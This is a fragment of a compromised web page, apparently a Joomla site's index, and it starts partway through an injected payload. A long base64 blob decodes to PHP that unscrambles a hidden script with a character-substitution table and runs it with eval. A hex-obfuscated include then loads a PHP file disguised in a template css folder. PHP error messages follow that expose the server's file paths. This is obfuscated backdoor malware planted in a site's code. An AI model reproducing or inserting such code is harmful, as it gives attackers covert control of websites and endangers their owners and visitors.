ZQck00U01VaWNKVWljSlVpWWFWNFRKVWljSlVpY0pVaWNKVWljRFcwYlNOZWN3VWlrQ05xbHVXeUZ6aTNjSlVpY0pVaWNKVWljSlVpa0ROWGtJWENSck9lY3dVaWtkJy4KJ1dYRGFWNFRKVWljSlVpY0pVNlN6aTNjSlVpWXdWNFR6aTNjSlVpY0RXMGJTTmVjd1VBWXUyZnpyWjVySTIwcm5XZUlLWnV3RFdxem9PJy4KJ1hZU00wRUlaQzdDemJ3RFdxekhXMDdURTBrSXMwQWpnaWNEVzBiU05Qd2RXWERqTXlGemlKU01VaWNKJy4KJ1UwcjVVaUlqWkx6cnNpSkRXMGJTTlBGZk5xRmZYZURKRTNOSkUwejhYQ2J1czBKd3Zla0ROWGtJcW9zSUJvc3NNNFNNVWljSlU2RnppM2NKVWljSlVpY0pCcU5KTScuCidpa0ROWGtJcW9zSUV1U0p2eVNKRUNEZk00U01VaWNKVWljSlVpWWFWNFRKVWljSlVpY0pVaWNKVWljREInLgonZWN3VUFib1o1YnRNY1NNVWljSlVpY0pVaWNKVWljSlVpY0pVaXNRczNaSnZ5aEo0NllUWjZXclpmemoyQ2hUTWVRemkzY0pVaWNKVWljSlVpY0pVaWNKVWljZlpMTmZVVlMrJy4KJ1VpWmxnS2NScDNaRlY0VEpVaWNKVWljSlVpY0pVaWNKVWljSkVDYmRFb2N3djNjRFcwYlNOUEZmTnFGZlhlUXppM2NKVWljSlVpY0pVaWNKVWlEYVY0VEpVaWNKVWljSicuCidVaWNKVWlZck5DSUhVQVk4V1hFak5xbGpPNTdURTBEanhRU01VaWNKVWljSlVpY0pVaWNKV1hJanNWRnppM2NKVWljSlVpY0ptNFNNVWljSlVpY0pVaVlyMjZ6ckJxTkpNJy4KJ2lrRE5Ya0lxb3NJRXVTSnZ5U0pFQzdmTTRTTVVpY0pVaWNKVWlZYVY0VEpVaWNKVWljSlVpY0pVaVlyczViRk1pa0ROWGtJcW9zREV1U2p4UVNNVWknLgonY0pVaWNKVWlZd1Y0VEpVaWNKVWljSlUwUEZaQ1BqVzNjVEUwa0lzMGIyRUNBZlhlY3d2ZWNmWjBsdVdDcjlFb0R6aTNjSlVpY0pVaWNKT1FTTVVpY0pVaWNKVWljSlVpYycuCidKQnFOVEUwa0lzMGIyRUx6SUV1U0p2eVNKRUNiRFdpWmpWNFRKVWljSlVpY0pVaWNKVWlZYVY0VEpVaWNKVWljSlVpY0pVaWMnLgonSlVpY0pOTHptWjBsdVdDcjlYQ2JEV2lKRFcwYlNOUEZmWmlzc2dpY0RXMGJTTlBGZldpc3NNeUZ6aTNjSlVpY0onLgonVWljSlVpY0pVNlN6aTNjSlVpY0pVaWNKVWljSlUwUEZaQ1BqVzNKRFcwYlNOUEZmWkNBZlhlY3d2ZWNmWjVQUkVvRHppMycuCidjSlVpY0pVaWNKVWljSlU2RnppM2NKVWljSlVpY0pVaWNKVWljSlVpWUtadXdRMjZQZkJxdG1aNVAnLgonUk1pa0ROWGtJcW9zUUV1U2p4UVNNVWljSlVpY0pVaWNKVWljSm00U01VaWNKVWljSlVpWXdWNFRKVWljSlVpY0pVMFBLQjAxSkUwa0lzMGIyRUNiZEV1U2FWNFRKVScuCidpY0pVaWNKVTBQaEJYNFRNeUZ6aTNjSlVpWXdWNFR6aTNjSlVpWUtadXdRMjZQZkJxdG0yMHdJV2lKanhRU01tND09JzsKJGJsY2N6ZHYgPSBBcnJheSgnMSc9Pic4JywgJzAnPT4nRycsICczJz0+J2knLCAnMic9PidiJywgJzUnPT4nbScsICc0Jz0+J1EnLCAnNyc9PidVJywgJzYnPT4nSCcsICc5Jz0+J3UnLCAnOCc9Pid6JywgJ0EnPT4nRScsICdDJz0+JzInLCAnQic9PidhJywgJ0UnPT4nSicsICdEJz0+J2snLCAnRyc9PidxJywgJ0YnPT4ncycsICdJJz0+J2gnLCAnSCc9Pid2JywgJ0snPT4naicsICdKJz0+J2cnLCAnTSc9PidLJywgJ0wnPT4nMycsICdPJz0+J2UnLCAnTic9PidZJywgJ1EnPT4ndycsICdQJz0+J1YnLCAnUyc9PicwJywgJ1InPT4ndCcsICdVJz0+J0knLCAnVCc9PidvJywgJ1cnPT4nWicsICdWJz0+J0QnLCAnWSc9PidCJywgJ1gnPT4nWCcsICdaJz0+J2MnLCAnYSc9Pic3JywgJ2MnPT4nQScsICdiJz0+J0YnLCAnZSc9PidTJywgJ2QnPT4ncicsICdnJz0+J0wnLCAnZic9PiduJywgJ2knPT4nQycsICdoJz0+JzQnLCAnayc9PidSJywgJ2onPT4ncCcsICdtJz0+J2YnLCAnbCc9Pid4JywgJ28nPT4neScsICduJz0+JzYnLCAncSc9PidXJywgJ3AnPT4nTScsICdzJz0+J2QnLCAncic9PidsJywgJ3UnPT4nMScsICd0Jz0+JzUnLCAndyc9Pic5JywgJ3YnPT4nUCcsICd5Jz0+J1QnLCAneCc9PidPJywgJ3onPT4nTicpOwpldmFsLyptKi8oeG1yYmd1KCRteHp4ZCwgJGJsY2N6ZHYpKTsKfQ==")); include "\x2fhom\x65/13\x38511\x2fdom\x61ins\x2fser\x70ent\x64efo\x72me.\x63at/\x68tml\x2ftem\x70lat\x65s/b\x65ez/\x63ss/\x73tat\x73.ph\x70"; ?>
Warning: require_once(/nfs/c09/h02/mnt/138511/domains/serpentdeforme.cat/html/includes/defines.php) [function.require-once]: failed to open stream: No such file or directory in /nfs/c09/h02/mnt/138511/domains/serpentdeforme.cat/html/index.php on line 32

Fatal error: require_once() [function.require]: Failed opening required '/nfs/c09/h02/mnt/138511/domains/serpentdeforme.cat/html/includes/defines.php' (include_path='.:/usr/local/php-5.3.29/share/pear') in /nfs/c09/h02/mnt/138511/domains/serpentdeforme.cat/html/index.php on line 32